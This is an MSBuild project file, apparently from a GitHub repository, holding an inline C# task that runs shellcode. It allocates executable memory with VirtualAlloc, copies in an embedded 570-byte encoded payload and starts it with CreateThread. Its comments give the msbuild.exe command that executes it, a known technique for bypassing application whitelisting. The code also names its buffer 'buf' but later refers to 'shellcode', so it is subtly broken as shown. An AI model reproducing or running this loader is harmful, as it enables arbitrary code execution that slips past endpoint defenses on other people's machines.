-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtest.proj
111 lines (109 loc) · 5.04 KB
/
test.proj
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
public override bool Execute()
{
//replace with your own shellcode
byte[] buf = new byte[570] {0xdd,0xc1,0xba,0x77,0x41,0xc6,
0xc3,0xd9,0x74,0x24,0xf4,0x58,0x33,0xc9,0xb1,0x88,0x83,0xc0,
0x04,0x31,0x50,0x16,0x03,0x50,0x16,0xe2,0x82,0x9a,0x1b,0x1a,
0x18,0x39,0x50,0xc7,0x5f,0xfb,0xa8,0x5a,0x30,0xd7,0x01,0x2b,
0xcc,0xab,0x78,0xb0,0xe1,0xd1,0x6f,0x4a,0xc1,0x05,0xd0,0x16,
0x2e,0xc2,0xe9,0xe5,0xeb,0x43,0x65,0xbf,0x1c,0xde,0xf2,0x01,
0xc4,0x6d,0x2e,0xc7,0x31,0x7d,0xde,0x06,0x13,0x76,0x72,0xdd,
0x2d,0xc9,0x48,0x9a,0xc7,0x46,0xf0,0x07,0x77,0xdd,0xf0,0x9d,
0x89,0xb8,0x85,0x08,0xe8,0x00,0x18,0x33,0x6a,0x0d,0x03,0x7c,
0xd1,0x30,0x3e,0x13,0x8f,0x34,0xed,0x1a,0xd0,0xac,0xbe,0x25,
0x1a,0x47,0xef,0x65,0xeb,0xee,0x81,0xe5,0x34,0x4d,0xd4,0xae,
0xfa,0xd4,0xc8,0x99,0x03,0xe3,0xdb,0xe4,0x26,0xd9,0x0b,0x7a,
0xf2,0x2b,0xa7,0x95,0x75,0x29,0x5c,0x39,0x91,0x64,0xea,0x61,
0xab,0x56,0x58,0xe4,0xd8,0xdc,0x22,0x7a,0x29,0x5b,0x55,0x49,
0xe8,0x8e,0xe7,0x44,0x75,0x43,0x72,0x84,0x92,0xc1,0xf2,0xe9,
0x1e,0xb9,0xa8,0x9a,0x5d,0x03,0x2d,0xa3,0xb6,0x57,0x8c,0x6f,
0xb0,0x3a,0xee,0x9c,0xc9,0xc6,0x34,0x10,0x25,0x99,0x2c,0x31,
0x7f,0x21,0x4c,0x79,0x95,0x00,0xb1,0x31,0xd1,0x50,0xb0,0x59,
0xdf,0xf8,0x7b,0x64,0xd9,0xcf,0x7c,0xe3,0xa5,0x6a,0xb0,0x85,
0xff,0xdc,0x4e,0x82,0xc2,0x67,0x69,0x70,0xbf,0xd3,0xe3,0x22,
0x56,0xdb,0x8d,0x6e,0x0c,0x08,0xef,0xb8,0xef,0x1c,0x85,0xd6,
0xf2,0x33,0xb0,0xee,0x62,0xf4,0x92,0xc3,0xbf,0x06,0xb2,0xfd,
0x91,0xd7,0xdc,0x1c,0x6a,0x1f,0xa6,0xc3,0xe2,0x43,0x2d,0x10,
0xe0,0x8b,0x00,0x8d,0x45,0x83,0x2b,0x34,0x52,0x53,0x9d,0x94,
0x16,0x56,0xba,0x0b,0x00,0x85,0x50,0x44,0xfe,0x7a,0x8b,0xab,
0xd8,0x72,0x22,0x71,0x59,0xf0,0x47,0x72,0xff,0x86,0x1a,0xab,
0xc8,0xe6,0x84,0x12,0xf5,0xca,0x6b,0x73,0x2e,0x9f,0x61,0x46,
0xb9,0xb4,0xd5,0xd1,0x8c,0x57,0x46,0x6a,0xc8,0xfc,0xb4,0x52,
0xd8,0x1a,0x3d,0x98,0x83,0x12,0x74,0x5f,0xc3,0xfd,0xd7,0xf7,
0x35,0xff,0x26,0xa4,0x8c,0x49,0x6c,0xfb,0xa0,0x0b,0x42,0x82,
0x72,0x4b,0xe9,0xc0,0x79,0x54,0xc1,0x06,0x6d,0x38,0x2c,0x94,
0x5b,0xab,0x33,0x55,0xcd,0x5a,0xd2,0x62,0x4d,0x5c,0xbc,0x06,
0x80,0xb4,0xce,0x2c,0x87,0xdf,0x6f,0xc3,0xa4,0x76,0x19,0x76,
0x77,0xf8,0xfb,0xab,0x4d,0x1b,0x3a,0x87,0xf6,0xe7,0xf4,0xa6,
0x5d,0x15,0x12,0x44,0x88,0xc2,0xf5,0xeb,0x6c,0xfb,0x7e,0xd6,
0x1c,0xbd,0xe2,0x94,0xcc,0x35,0x34,0x37,0x55,0x7e,0xc7,0xe5,
0x50,0xe3,0xb9,0xef,0xff,0xf9,0x4a,0xb1,0x4f,0xd9,0x6e,0xf0,
0xfb,0x7d,0x43,0xa3,0xf3,0xa2,0x3c,0x62,0x0e,0x0b,0x5f,0x38,
0x8b,0x04,0x00,0x71,0xcf,0x67,0x10,0x65,0xa8,0xe7,0x32,0xf5,
0x9a,0x30,0x81,0xb1,0x9b,0xbc,0xc2,0x8d,0xbc,0x00,0x48,0xae,
0x0f,0x4c,0x6d,0x01,0x7c,0xdb,0xe7,0x45,0x67,0x1e,0x81,0x7f,
0xab,0x2f,0x5f,0xf2,0x3d,0xea,0xeb,0xcd,0xb7,0x06,0x24,0xa8,
0x49,0x6e,0x24,0x64,0xe2,0x18,0xff,0x93,0x0a,0x5c,0x37,0x0b,
0xca,0xa8,0x7b,0x62,0xd9,0xfa,0x1a,0x52,0xcf,0x10,0x88,0x4a,
0x8b,0x49,0xc1,0xeb,0x19,0x9a,0x40,0x96,0x63,0x11,0xd7,0x83,
0x77,0x7a,0x85,0xa3,0x56,0x4f,0x31,0xfd,0x1b,0x5a,0x81,0x37,
0x50,0xa0,0x37,0xf8,0xf6,0x99,0xe7,0x60,0x86,0x99,0xfd,0xfe,
0x88,0xa6,0xce,0x17,0x40,0xae,0xf4,0x3f,0x9b,0xd4,0xbf,0xb8
};
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>